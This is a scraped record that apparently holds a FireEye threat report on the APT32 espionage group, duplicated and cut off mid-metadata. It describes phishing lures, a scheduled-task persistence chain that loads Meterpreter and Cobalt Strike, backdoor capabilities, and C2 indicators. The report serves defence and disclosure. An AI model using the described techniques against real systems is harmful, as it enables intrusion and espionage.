\n\nce50e544430e7265a45fab5a1f31e529 \n \nPhan Vu Tutn CV.doc\n\n| \n\n4f761095ca51bfbbf4496a4964e41d4f \n \nKe hoach cuu tro nam 2017.doc \n(2017 Bailout Plan) | \n\ne9abe54162ba4572c770ab043f576784 \n \nInstructions to GSIS.doc\n\n| \n\nfba089444c769700e47c6b44c362f96b \n \nHoi thao truyen thong doc lap.doc \n(Traditional Games) | \n\nf6ee4b72d6d42d0c7be9172be2b817c1 \n \nGi\u1ea5y y\u00eau c\u1ea7u b\u1ed3i th\u01b0\u1eddng m\u1edbi 2016 - h\u1eb1ng.doc \n(New 2016 Claim Form) | \n\naa1f85de3e4d33f31b4f78968b29f175 \n \nHoa don chi tiet tien no.doc \n(Debt Details) | \n\n5180a8d9325a417f2d8066f9226a5154 \n \nThu moi tham du Hoi luan.doc \n(Collection of Participants) | \n\nf6ee4b72d6d42d0c7be9172be2b817c1 \n \nDanh sach nhan vien vi pham ky luat.doc \n(List of Employee Violations) | \n\n6baafffa7bf960dec821b627f9653e44 \n \nNo\u0323\u0302i-dung-qua\u0309ng-ca\u0301o.doc \n(Internal Content Advertising) | \n\n471a2e7341f2614b715dc89e803ffcac \n \nH\u0110 DVPM-VTC 31.03.17.doc\n\n| \n\nf1af6bb36cdf3cff768faee7919f0733 \n \nTable 2: Sampling of APT32 Lure Files\n\nThe Base64 encoded ActiveMime data also contained an OLE file with malicious macros. When opened, many lure files displayed fake error messages in an attempt to trick users into launching the malicious macros. Figure 1 shows a fake Gmail-theme paired with a hexadecimal error code that encourages the recipient to enable content to resolve the error. Figure 2 displays another APT32 lure that used a convincing image of a fake Windows error message instructing the recipient to enable content to properly display document font characters.\n\nFigure 1: Example APT32 Phishing Lure \u2013 Fake Gmail Error Message\n\nFigure 2: Example APT32 Phishing Lure \u2013 Fake Text Encoding Error Message\n\nAPT32 operators implemented several novel techniques to track the efficacy of their phishing, monitor the distribution of their malicious documents, and establish persistence mechanisms to dynamically update backdoors injected into memory.\n\nIn order to track who opened the phishing emails, viewed the links, and downloaded the attachments in real-time, APT32 used cloud-based email analytics software designed for sales organizations. In some instances, APT32 abandoned direct email attachments altogether and relied exclusively on this tracking technique with links to their ActiveMime lures hosted externally on legitimate cloud storage services.\n\nTo enhance visibility into the further distribution of their phishing lures, APT32 utilized the native web page functionality of their ActiveMime documents to link to external images hosted on APT32 monitored infrastructure.\n\nFigure 3 contains an example phishing lure with HTML image tags used for additional tracking by APT32.\n\nFigure 3: Phishing Lure Containing HTML Image Tags for Additional Tracking\n\nWhen a document with this feature is opened, Microsoft Word will attempt to download the external image, even if macros were disabled. In all phishing lures analyzed, the external images did not exist. Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images. When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms.\n\nOnce macros were enabled on the target system, the malicious macros created two named scheduled tasks as persistence mechanisms for two backdoors on the infected system. The first named scheduled task launched an application whitelisting script protection bypass to execute a COM scriptlet that dynamically downloaded the first backdoor from APT32\u2019s infrastructure and injected it into memory. The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script. In most lures, one scheduled task persisted an APT32-specific backdoor and the other scheduled task initialized a commercially-available backdoor as backup.\n\nTo illustrate the complexity of these lures, Figure 4 shows the creation of persistence mechanisms for recovered APT32 lure \u201c2017\u5e74\u5458\u5de5\u5de5\u8d44\u6027\u6d25\u8d34\u989d\u7edf\u8ba1\u62a5\u544a.doc\u201d.\n\nFigure 4: APT32 ActiveMime Lures Create Two Named Scheduled Tasks\n\nIn this example, a scheduled task named \u201cWindows Scheduled Maintenance\u201d was created to run Casey Smith\u2019s [\u201cSquiblydoo\u201d App Whitelisting bypass](<http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html>) every 30 minutes. While all payloads can be dynamically updated, at the time of delivery, this task launched a COM scriptlet (\u201c.sct\u201d file extension) that downloaded and executed Meterpreter hosted on images.chinabytes[.]info. Meterpreter then loaded Cobalt Strike BEACON, configured to communicate with 80.255.3[.]87 using the [Safebrowsing malleable C2 profile](<https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/safebrowsing.profile>) to further blend in with network traffic. A second scheduled task named \u201cScheduled Defrags\u201d was created by loading the raw task XML with a backdated task creation timestamp of June 2, 2016. This second task ran \u201cmshta.exe\u201d every 50 minutes which launched an APT32-specific backdoor delivered as shellcode in a PowerShell script, configured to communicate with the domains blog.panggin[.]org, share.codehao[.]net, and yii.yiihao126[.]net.\n\nFigure 5 illustrates the chain of events for a single successful APT32 phishing lure that dynamically injects two multi-stage malware frameworks into memory.\n\nFigure 5: APT32 Phishing Chain of Events\n\nThe impressive APT32 operations did not stop after they established a foothold in victim environments. Several Mandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon\u2019s [Invoke-Obfuscation](<https://github.com/danielbohannon/Invoke-Obfuscation>) framework.\n\nAPT32 regularly used stealthy techniques to blend in with legitimate user activity:\n\n * During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix.\n * In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol.\n * APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it. Another backdoor used an otherwise legitimate DLL filename padded with a non-printing OS command control code.\n\n#### APT32 Malware and Infrastructure\n\nAPT32 appears to have a well-resourced development capability and uses a custom suite of backdoors spanning multiple protocols. APT32 operations are characterized through deployment of signature malware payloads including WINDSHIELD, KOMPROGO, SOUNDBITE, and PHOREAL. APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor. APT32 may also possess [backdoor development capabilities for macOS](<https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update>).\n\nThe capabilities for this unique suite of malware is shown in Table 3.\n\n**Malware**\n\n| \n\n**Capabilities** \n \n---|--- \n \nWINDSHIELD\n\n| \n\n * Command and control (C2) communications via TCP raw sockets\n * Four configured C2s and six configured ports \u2013 randomly-chosen C2/port for communications\n * Registry manipulation\n * Get the current module's file name\n * Gather system information including registry values, user name, computer name, and current code page\n * File system interaction including directory creation, file deletion, reading, and writing files\n * Load additional modules and execute code\n * Terminate processes\n * Anti-disassembly \n \nKOMPROGO\n\n| \n\n * Fully-featured backdoor capable of process, file, and registry management\n * Creating a reverse shell\n * File transfers\n * Running WMI queries\n * Retrieving information about the infected system \n \nSOUNDBITE\n\n| \n\n * C2 communications via DNS\n * Process creation\n * File upload\n * Shell command execution\n * File and directory enumeration/manipulation\n * Window enumeration\n * Registry manipulation\n * System information gathering \n \nPHOREAL\n\n| \n\n * C2 communications via ICMP\n * Reverse shell creation\n * Filesystem manipulation\n * Registry manipulation\n * Process creation\n * File upload \n \nBEACON (Cobalt Strike)\n\n| \n\n * Publicly available payload that can inject and execute arbitrary code into processes\n * Impersonating the security context of users\n * Importing Kerberos tickets\n * Uploading and downloading files\n * Executing shell commands\n * Configured with malleable C2 profiles to blend in with normal network traffic\n * Co-deployment and interoperability with Metasploit framework\n * SMB Named Pipe in-memory backdoor payload that enables peer-to-peer C2 and pivoting over SMB \n \nTable 3: APT32 Malware and Capabilities\n\nAPT32 operators appear to be well-resourced and supported as they use a large set of domains and IP addresses as command and control infrastructure. The [FireEye iSIGHT Intelligence MySIGHT Portal](<https://www.fireeye.com/products/isight-intelligence.html>) contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions.\n\nFigure 6 provides a summary of APT32 tools and techniques mapped to each stage of the attack lifecycle.\n\nFigure 6: APT32 Attack Lifecycle\n\n#### Outlook and Implications\n\nBased on incident response investigations, product detections, and intelligence observations along with additional publications on the same operators, FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests. The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in, or preparing to invest in, the country. While the motivation for each APT32 private sector compromise varied \u2013 and in some cases was unknown \u2013 the unauthorized access could serve as a platform for law enforcement, intellectual property theft, or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations. Furthermore, APT32 continues to threaten political activism and free speech in Southeast Asia and the public sector worldwide. Governments, journalists, and members of the Vietnam diaspora may continue to be targeted.\n\nWhile actors from China, Iran, Russia, and North Korea remain the most active cyber espionage threats tracked and responded to by FireEye, APT32 reflects a growing host of new countries that have adopted this dynamic capability. APT32 demonstrates how accessible and impactful offensive capabilities can be with the proper investment and the flexibility to embrace newly-available tools and techniques. As more countries utilize inexpensive and efficient cyber operations, there is a need for public awareness of these threats and renewed dialogue around emerging nation-state intrusions that go beyond public sector and intelligence targets.\n\n#### APT32 Detection\n\nFigure 7 contains a Yara rule can be used to identify malicious macros associated with APT32\u2019s phishing lures:\n\nFigure 7: Yara Rule for APT32 Malicious Macros\n\nTable 4 contains a sampling of the infrastructure that FireEye has associated with APT32 C2.\n\n**C2 Infrastructure** \n \n--- \n \n103.53.197.202\n\n| \n\n104.237.218.70\n\n| \n\n104.237.218.72 \n \n185.157.79.3\n\n| \n\n193.169.245.78\n\n| \n\n193.169.245.137 \n \n23.227.196.210\n\n| \n\n24.datatimes.org\n\n| \n\n80.255.3.87 \n \nblog.docksugs.org\n\n| \n\nblog.panggin.org\n\n| \n\ncontay.deaftone.com \n \ncheck.paidprefund.org\n\n| \n\ndatatimes.org\n\n| \n\ndocksugs.org \n \neconomy.bloghop.org\n\n| \n\nemp.gapte.name\n\n| \n\nfacebook-cdn.net \n \ngap-facebook.com\n\n| \n\ngl-appspot.org\n\n| \n\nhelp.checkonl.org \n \nhigh.expbas.net\n\n| \n\nhigh.vphelp.net\n\n| \n\nicon.torrentart.com \n \nimages.chinabytes.info\n\n| \n\nimaps.qki6.com\n\n| \n\nimg.fanspeed.net \n \njob.supperpow.com\n\n| \n\nlighpress.info\n\n| \n\nmenmin.strezf.com \n \nmobile.pagmobiles.info\n\n| \n\nnews.lighpress.info\n\n| \n\nnotificeva.com \n \nnsquery.net\n\n| \n\npagmobiles.info\n\n| \n\npaidprefund.org \n \npush.relasign.org\n\n| \n\nrelasign.org\n\n| \n\nshare.codehao.net \n \nseri.volveri.net\n\n| \n\nssl.zin0.com\n\n| \n\nstatic.jg7.org \n \nsyn.timeizu.net\n\n| \n\nteriava.com\n\n| \n\ntimeizu.net \n \ntonholding.com\n\n| \n\ntulationeva.com\n\n| \n\nuntitled.po9z.com \n \nupdate-flashs.com\n\n| \n\nvieweva.com\n\n| \n\nvolveri.net \n \nvphelp.net\n\n| \n\nyii.yiihao126.net\n\n| \n\nzone.apize.net \n \nTable 4: Sampling of APT32 C2 Infrastructure\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-14T18:00:00", "type": "fireeye", "title": "Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": "2017-05-14T18:00:00", "id": "FIREEYE:3E714A2B7BA85E8C1459F38BE1BC289A", "href": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-12T18:15:32", "description": "Cyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists. FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.\n\n#### APT32 and FireEye\u2019s Community Response\n\nIn the course of investigations into intrusions at several corporations with business interests in Vietnam, FireEye\u2019s Mandiant incident response consultants uncovered activity and attacker-controlled infrastructure indicative of a significant intrusion campaign. In March 2017, in response to active targeting of FireEye clients, the team launched a [Community Protection Event (CPE)](<https://www2.fireeye.com/WEB-Community-Protection-Security-Numbers.html>) \u2013 a coordinated effort between Mandiant incident responders, FireEye as a Service (FaaS), FireEye iSight Intelligence, and FireEye product engineering \u2013 to protect all clients from APT32 activity.\n\nIn the following weeks, FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32\u2019s tools and phishing lures. This focused intelligence and detection effort led to new external victim identifications as well as providing sufficient technical evidence to link twelve prior intrusions, consolidating four previously unrelated clusters of threat actor activity into FireEye\u2019s newest named advanced persistent threat group: APT32.\n\n#### APT32 Targeting of Private Sector Company Operations in Southeast Asia\n\nSince at least 2014, FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam\u2019s manufacturing, consumer products, and hospitality sectors. Furthermore, there are indications that APT32 actors are targeting peripheral network security and technology infrastructure corporations.\n\nHere is an overview of intrusions investigated by FireEye that are attributed to APT32:\n\n * In 2014, a European corporation was compromised prior to constructing a manufacturing facility in Vietnam.\n * In 2016, Vietnamese and foreign-owned corporations working in network security, technology infrastructure, banking, and media industries were targeted. \n * In mid-2016, malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam.\n * From 2016 through 2017, two subsidiaries of U.S. and Philippine consumer products corporations, located inside Vietnam, were the target of APT32 intrusion operations.\n\nTable 1 shows a breakdown of APT32 activity, including the malware families used in each.\n\n**Year**\n\n| \n\n**Country**\n\n| \n\n**Industry**\n\n| \n\n**Malware** \n \n---|---|---|--- \n \n2014\n\n| \n\nVietnam\n\n| \n\nNetwork Security\n\n| \n\nWINDSHIELD \n \n2014\n\n| \n\nGermany\n\n| \n\nManufacturing\n\n| \n\nWINDSHIELD \n \n2015\n\n| \n\nVietnam\n\n| \n\nMedia\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nPhilippines\n\n| \n\nConsumer products\n\n| KOMPROGO \nWINDSHIELD \nSOUNDBITE \nBEACON \n \n \n2016\n\n| \n\nVietnam\n\n| \n\nBanking\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nPhilippines\n\n| \n\nTechnology Infrastructure\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nChina\n\n| \n\nHospitality\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nVietnam\n\n| \n\nMedia\n\n| \n\nWINDSHIELD \n \n2016\n\n| \n\nUnited States\n\n| \n\nConsumer Products\n\n| WINDSHIELD \nPHOREAL \nBEACON \nSOUNDBITE \n \nTable 1: APT32 Private Sector Targeting Identified by FireEye\n\n#### APT32 Interest in Political Influence and Foreign Governments\n\nIn addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign governments, as well as Vietnamese dissidents and journalists since at least 2013. Here is an overview of this activity:\n\n * A [public blog published by the _Electronic Frontier Foundation_](<https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal>) indicated that journalists, activists, dissidents, and bloggers were targeted in 2013 by malware and tactics consistent with APT32 operations.\n * In 2014, APT32 leveraged a spear-phishing attachment titled \u201cPlans to crackdown on protesters at the Embassy of Vietnam.exe,\" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia. Also in 2014, APT32 carried out an intrusion against a Western country\u2019s national legislature.\n * In 2015, SkyEye Labs, the security research division of the Chinese firm Qihoo 360, [released a report](<http://blogs.360.cn/blog/oceanlotus-apt>) detailing threat actors that were targeting Chinese public and private entities including government agencies, research institutes, maritime agencies, sea construction, and shipping enterprises. The information included in the report indicated that the perpetrators used the same malware, overlapping infrastructure, and similar targets as APT32.\n * In 2015 and 2016, two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32.\n * In 2017, social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines.\n\n#### APT32 Tactics\n\nIn their current campaign, APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros. Upon execution, the initialized file downloads multiple malicious payloads from remote servers. APT32 actors continue to deliver the malicious attachments via spear-phishing emails.\n\nAPT32 actors designed multilingual lure documents which were tailored to specific victims. Although the files had \u201c.doc\u201d file extensions, the recovered phishing lures were ActiveMime \u201c.mht\u201d web page archives that contained text and images. These files were likely created by exporting Word documents into single file web pages.\n\nTable 2 contains a sample of recovered APT32 multilingual lure files.\n\n**ActiveMime Lure Files**\n\n| \n\n**MD5** \n \n---|--- \n2017\u5e74\u5458\u5de5\u5de5\u8d44\u6027\u6d25\u8d34\u989d\u7edf\u8ba1\u62a5\u544a.doc \n(2017 Statistical Report on Staff Salary and Allowances) | \n\n5458a2e4d784abb1a1127263bd5006b5 \n \nThong tin.doc \n(Information) | \n\nce50e544430e7265a45fab5a1f31e529 \n \nPhan Vu Tutn CV.doc\n\n| \n\n4f761095ca51bfbbf4496a4964e41d4f \n \nKe hoach cuu tro nam 2017.doc \n(2017 Bailout Plan) | \n\ne9abe54162ba4572c770ab043f576784 \n \nInstructions to GSIS.doc\n\n| \n\nfba089444c769700e47c6b44c362f96b \n \nHoi thao truyen thong doc lap.doc \n(Traditional Games) | \n\nf6ee4b72d6d42d0c7be9172be2b817c1 \n \nGi\u1ea5y y\u00eau c\u1ea7u b\u1ed3i th\u01b0\u1eddng m\u1edbi 2016 - h\u1eb1ng.doc \n(New 2016 Claim Form) | \n\naa1f85de3e4d33f31b4f78968b29f175 \n \nHoa don chi tiet tien no.doc \n(Debt Details) | \n\n5180a8d9325a417f2d8066f9226a5154 \n \nThu moi tham du Hoi luan.doc \n(Collection of Participants) | \n\nf6ee4b72d6d42d0c7be9172be2b817c1 \n \nDanh sach nhan vien vi pham ky luat.doc \n(List of Employee Violations) | \n\n6baafffa7bf960dec821b627f9653e44 \n \nNo\u0323\u0302i-dung-qua\u0309ng-ca\u0301o.doc \n(Internal Content Advertising) | \n\n471a2e7341f2614b715dc89e803ffcac \n \nH\u0110 DVPM-VTC 31.03.17.doc\n\n| \n\nf1af6bb36cdf3cff768faee7919f0733 \n \nTable 2: Sampling of APT32 Lure Files\n\nThe Base64 encoded ActiveMime data also contained an OLE file with malicious macros. When opened, many lure files displayed fake error messages in an attempt to trick users into launching the malicious macros. Figure 1 shows a fake Gmail-theme paired with a hexadecimal error code that encourages the recipient to enable content to resolve the error. Figure 2 displays another APT32 lure that used a convincing image of a fake Windows error message instructing the recipient to enable content to properly display document font characters.\n\nFigure 1: Example APT32 Phishing Lure \u2013 Fake Gmail Error Message\n\nFigure 2: Example APT32 Phishing Lure \u2013 Fake Text Encoding Error Message\n\nAPT32 operators implemented several novel techniques to track the efficacy of their phishing, monitor the distribution of their malicious documents, and establish persistence mechanisms to dynamically update backdoors injected into memory.\n\nIn order to track who opened the phishing emails, viewed the links, and downloaded the attachments in real-time, APT32 used cloud-based email analytics software designed for sales organizations. In some instances, APT32 abandoned direct email attachments altogether and relied exclusively on this tracking technique with links to their ActiveMime lures hosted externally on legitimate cloud storage services.\n\nTo enhance visibility into the further distribution of their phishing lures, APT32 utilized the native web page functionality of their ActiveMime documents to link to external images hosted on APT32 monitored infrastructure.\n\nFigure 3 contains an example phishing lure with HTML image tags used for additional tracking by APT32.\n\nFigure 3: Phishing Lure Containing HTML Image Tags for Additional Tracking\n\nWhen a document with this feature is opened, Microsoft Word will attempt to download the external image, even if macros were disabled. In all phishing lures analyzed, the external images did not exist. Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images. When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms.\n\nOnce macros were enabled on the target system, the malicious macros created two named scheduled tasks as persistence mechanisms for two backdoors on the infected system. The first named scheduled task launched an application whitelisting script protection bypass to execute a COM scriptlet that dynamically downloaded the first backdoor from APT32\u2019s infrastructure and injected it into memory. The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script. In most lures, one scheduled task persisted an APT32-specific backdoor and the other scheduled task initialized a commercially-available backdoor as backup.\n\nTo illustrate the complexity of these lures, Figure 4 shows the creation of persistence mechanisms for recovered APT32 lure \u201c2017\u5e74\u5458\u5de5\u5de5\u8d44\u6027\u6d25\u8d34\u989d\u7edf\u8ba1\u62a5\u544a.doc\u201d.\n\nFigure 4: APT32 ActiveMime Lures Create Two Named Scheduled Tasks\n\nIn this example, a scheduled task named \u201cWindows Scheduled Maintenance\u201d was created to run Casey Smith\u2019s [\u201cSquiblydoo\u201d App Whitelisting bypass](<http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html>) every 30 minutes. While all payloads can be dynamically updated, at the time of delivery, this task launched a COM scriptlet (\u201c.sct\u201d file extension) that downloaded and executed Meterpreter hosted on images.chinabytes[.]info. Meterpreter then loaded Cobalt Strike BEACON, configured to communicate with 80.255.3[.]87 using the [Safebrowsing malleable C2 profile](<https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/safebrowsing.profile>) to further blend in with network traffic. A second scheduled task named \u201cScheduled Defrags\u201d was created by loading the raw task XML with a backdated task creation timestamp of June 2, 2016. This second task ran \u201cmshta.exe\u201d every 50 minutes which launched an APT32-specific backdoor delivered as shellcode in a PowerShell script, configured to communicate with the domains blog.panggin[.]org, share.codehao[.]net, and yii.yiihao126[.]net.\n\nFigure 5 illustrates the chain of events for a single successful APT32 phishing lure that dynamically injects two multi-stage malware frameworks into memory.\n\nFigure 5: APT32 Phishing Chain of Events\n\nThe impressive APT32 operations did not stop after they established a foothold in victim environments. Several Mandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon\u2019s [Invoke-Obfuscation](<https://github.com/danielbohannon/Invoke-Obfuscation>) framework.\n\nAPT32 regularly used stealthy techniques to blend in with legitimate user activity:\n\n * During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix.\n * In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol.\n * APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it. Another backdoor used an otherwise legitimate DLL filename padded with a non-printing OS command control code.\n\n#### APT32 Malware and Infrastructure\n\nAPT32 appears to have a well-resourced development capability and uses a custom suite of backdoors spanning multiple protocols. APT32 operations are characterized through deployment of signature malware payloads including WINDSHIELD, KOMPROGO, SOUNDBITE, and PHOREAL. APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor. APT32 may also possess [backdoor development capabilities for macOS](<https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update>).\n\nThe capabilities for this unique suite of malware is shown in Table 3.\n\n**Malware**\n\n| \n\n**Capabilities** \n \n---|--- \n \nWINDSHIELD\n\n| \n\n * Command and control (C2) communications via TCP raw sockets\n * Four configured C2s and six configured ports \u2013 randomly-chosen C2/port for communications\n * Registry manipulation\n * Get the current module's file name\n * Gather system information including registry values, user name, computer name, and current code page\n * File system interaction including directory creation, file deletion, reading, and writing files\n * Load additional modules and execute code\n * Terminate processes\n * Anti-disassembly \n \nKOMPROGO\n\n| \n\n * Fully-featured backdoor capable of process, file, and registry management\n * Creating a reverse shell\n * File transfers\n * Running WMI queries\n * Retrieving information about the infected system \n \nSOUNDBITE\n\n| \n\n * C2 communications via DNS\n * Process creation\n * File upload\n * Shell command execution\n * File and directory enumeration/manipulation\n * Window enumeration\n * Registry manipulation\n * System information gathering \n \nPHOREAL\n\n| \n\n * C2 communications via ICMP\n * Reverse shell creation\n * Filesystem manipulation\n * Registry manipulation\n * Process creation\n * File upload \n \nBEACON (Cobalt Strike)\n\n| \n\n * Publicly available payload that can inject and execute arbitrary code into processes\n * Impersonating the security context of users\n * Importing Kerberos tickets\n * Uploading and downloading files\n * Executing shell commands\n * Configured with malleable C2 profiles to blend in with normal network traffic\n * Co-deployment and interoperability with Metasploit framework\n * SMB Named Pipe in-memory backdoor payload that enables peer-to-peer C2 and pivoting over SMB \n \nTable 3: APT32 Malware and Capabilities\n\nAPT32 operators appear to be well-resourced and supported as they use a large set of domains and IP addresses as command and control infrastructure. The [FireEye iSIGHT Intelligence MySIGHT Portal](<https://www.fireeye.com/products/isight-intelligence.html>) contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions.\n\nFigure 6 provides a summary of APT32 tools and techniques mapped to each stage of the attack lifecycle.\n\nFigure 6: APT32 Attack Lifecycle\n\n#### Outlook and Implications\n\nBased on incident response investigations, product detections, and intelligence observations along with additional publications on the same operators, FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests. The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in, or preparing to invest in, the country. While the motivation for each APT32 private sector compromise varied \u2013 and in some cases was unknown \u2013 the unauthorized access could serve as a platform for law enforcement, intellectual property theft, or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations. Furthermore, APT32 continues to threaten political activism and free speech in Southeast Asia and the public sector worldwide. Governments, journalists, and members of the Vietnam diaspora may continue to be targeted.\n\nWhile actors from China, Iran, Russia, and North Korea remain the most active cyber espionage threats tracked and responded to by FireEye, APT32 reflects a growing host of new countries that have adopted this dynamic capability. APT32 demonstrates how accessible and impactful offensive capabilities can be with the proper investment and the flexibility to embrace newly-available tools and techniques. As more countries utilize inexpensive and efficient cyber operations, there is a need for public awareness of these threats and renewed dialogue around emerging nation-state intrusions that go beyond public sector and intelligence targets.\n\n#### APT32 Detection\n\nFigure 7 contains a Yara rule can be used to identify malicious macros associated with APT32\u2019s phishing lures:\n\nFigure 7: Yara Rule for APT32 Malicious Macros\n\nTable 4 contains a sampling of the infrastructure that FireEye has associated with APT32 C2.\n\n**C2 Infrastructure** \n \n--- \n \n103.53.197.202\n\n| \n\n104.237.218.70\n\n| \n\n104.237.218.72 \n \n185.157.79.3\n\n| \n\n193.169.245.78\n\n| \n\n193.169.245.137 \n \n23.227.196.210\n\n| \n\n24.datatimes.org\n\n| \n\n80.255.3.87 \n \nblog.docksugs.org\n\n| \n\nblog.panggin.org\n\n| \n\ncontay.deaftone.com \n \ncheck.paidprefund.org\n\n| \n\ndatatimes.org\n\n| \n\ndocksugs.org \n \neconomy.bloghop.org\n\n| \n\nemp.gapte.name\n\n| \n\nfacebook-cdn.net \n \ngap-facebook.com\n\n| \n\ngl-appspot.org\n\n| \n\nhelp.checkonl.org \n \nhigh.expbas.net\n\n| \n\nhigh.vphelp.net\n\n| \n\nicon.torrentart.com \n \nimages.chinabytes.info\n\n| \n\nimaps.qki6.com\n\n| \n\nimg.fanspeed.net \n \njob.supperpow.com\n\n| \n\nlighpress.info\n\n| \n\nmenmin.strezf.com \n \nmobile.pagmobiles.info\n\n| \n\nnews.lighpress.info\n\n| \n\nnotificeva.com \n \nnsquery.net\n\n| \n\npagmobiles.info\n\n| \n\npaidprefund.org \n \npush.relasign.org\n\n| \n\nrelasign.org\n\n| \n\nshare.codehao.net \n \nseri.volveri.net\n\n| \n\nssl.zin0.com\n\n| \n\nstatic.jg7.org \n \nsyn.timeizu.net\n\n| \n\nteriava.com\n\n| \n\ntimeizu.net \n \ntonholding.com\n\n| \n\ntulationeva.com\n\n| \n\nuntitled.po9z.com \n \nupdate-flashs.com\n\n| \n\nvieweva.com\n\n| \n\nvolveri.net \n \nvphelp.net\n\n| \n\nyii.yiihao126.net\n\n| \n\nzone.apize.net \n \nTable 4: Sampling of APT32 C2 Infrastructure\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-14T18:00:00", "type": "fireeye", "title": "Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, 